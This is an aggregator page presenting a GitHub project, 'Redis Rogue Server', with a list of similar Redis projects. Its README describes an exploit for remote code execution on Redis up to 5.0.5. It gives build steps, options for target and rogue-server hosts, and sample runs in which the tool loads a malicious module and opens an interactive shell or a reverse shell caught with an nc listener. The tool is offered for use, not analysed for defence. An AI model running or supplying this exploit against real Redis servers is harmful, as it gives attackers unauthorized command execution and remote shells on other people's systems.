n0b0dyCN / Redis Rogue Server
Licence: apache-2.0
Redis(<=5.0.5) RCE
Stars: ✭ 400
Programming Languages
c
50402 projects - #5 most used programming language
Projects that are alternatives of or similar to Redis Rogue Server
Gopherus
This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
Stars: ✭ 1,258 (+214.5%)
Mutual labels: redis, rce
Lettuce Core
Advanced Java Redis client for thread-safe sync, async, and reactive usage. Supports Cluster, Sentinel, Pipelining, and codecs.
Stars: ✭ 4,319 (+979.75%)
Mutual labels: redis
Docker Django
A complete docker package for deploying django which is easy to understand and deploy anywhere.
Stars: ✭ 378 (-5.5%)
Mutual labels: redis
Enferno
A Python framework based on Flask microframework, with batteries included, and best practices in mind.
Stars: ✭ 385 (-3.75%)
Mutual labels: redis
Mall Cloud Alibaba
mall-cloud-alibaba 是一套基于开源商城 mall 改造的 spring cloud alibaba 体系微服务商城系统。采用了spring cloud alibaba 、 Spring Cloud Greenwich、Spring Boot 2、MyBatis、Docker、Elasticsearch等核心技术。前台商城系统包含首页门户、商品推荐、商品搜索、商品展示、购物车、订单流程、会员中心、客户服务、帮助中心等模块。 后台管理系统包含商品管理、订单管理、会员管理、促销管理、运营管理、内容管理、统计报表、财务管理、权限管理、设置等模块。
Stars: ✭ 370 (-7.5%)
Mutual labels: redis
Gnomock
Test your code without writing mocks with ephemeral Docker containers 📦 Setup popular services with just a couple lines of code ⏱️ No bash, no yaml, only code 💻
Stars: ✭ 398 (-0.5%)
Mutual labels: redis
Redeo
High-performance framework for building redis-protocol compatible TCP servers/services
Stars: ✭ 392 (-2%)
Mutual labels: redis
Redlock Rb
Redlock is a redis-based distributed lock implementation in Ruby
Stars: ✭ 385 (-3.75%)
Mutual labels: redis
Groupbutler
This bot can help you in managing your group with rules, anti-flood, description, custom triggers, and much more!
Stars: ✭ 399 (-0.25%)
Mutual labels: redis
Redisview
RedisView implements open source, cross-platform and high performance Redis interface tools through self-written RESP protocol parsing, self-written tree model and thread pool. RedisView业余爱好通过自写RESP协议解析、自写树模型、线程池实现开源、跨平台、高性能Redis界面图形化工具
Stars: ✭ 377 (-5.75%)
Mutual labels: redis
Highdsa
2018年本科毕设项目,已更新所有开发和部署文档。基于Dubbo、SSM、Shiro、ELK、ActiveMQ、Redis等实现的一套高可用、高性能、高可扩展的分布式系统架构,实现可支持业务的基础公共服务,API使用Restful风格对外暴露。已经实现的包括:发送邮件服务、FastDFS文件存储服务、ELK实时日志查询服务、Redis缓存服务、Mybatis数据库、阿里短信推送、Goeasy消息推送、Druid监控、ActiveMQ消息队列、shiro权限认证、cas单点登录、权限配置web系统、移动端后台系统。持续更新中......
Stars: ✭ 385 (-3.75%)
Mutual labels: redis
Spring Samples For All
spring、spring-boot、spring-cloud 常用整合用例
Stars: ✭ 401 (+0.25%)
Mutual labels: redis
Redis Rogue Server
A exploit for Redis(<=5.0.5) RCE, inspired by Redis post-exploitation.
Support interactive shell and reverse shell!
Requirements
Python 3.6+
If you want to modify or recompile the redis module, you also require make
.
Usage
Compile exploit:
cd RedisModulesSDK/exp/
make
Copy the .so file to same folder with redis-rogue-server.py
.
➜ ./redis-rogue-server.py -h
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
Usage: redis-rogue-server.py [options]
Options:
-h, --help show this help message and exit
--rhost=REMOTE_HOST target host
--rport=REMOTE_PORT target redis port, default 6379
--lhost=LOCAL_HOST rogue server ip
--lport=LOCAL_PORT rogue server listen port, default 21000
--exp=EXP_FILE Redis Module to load, default exp.so
-v, --verbose Show full data stream
Example
Interactive shell
➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 127.0.0.1:6379
[info] SERVER 127.0.0.1:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] whoami
[>>] :n0b0dy
[<<]
Reverse shell
Invoke reverse shell:
➜ ./redis-rogue-server.py --rhost 127.0.0.1 --lhost 127.0.0.1
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 127.0.0.1:6379
[info] SERVER 127.0.0.1:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 127.0.0.1
Reverse server port: 9999
[info] Reverse shell payload sent.
[info] Check at 127.0.0.1:9999
[info] Unload module...
Receive reverse shell:
➜ nc -lvvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from localhost.localdomain 39312 received!
whoami
n0b0dy
Thanks
- RicterZ's redis exec module: https://github.com/RicterZ/RedisModules-ExecuteCommand
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].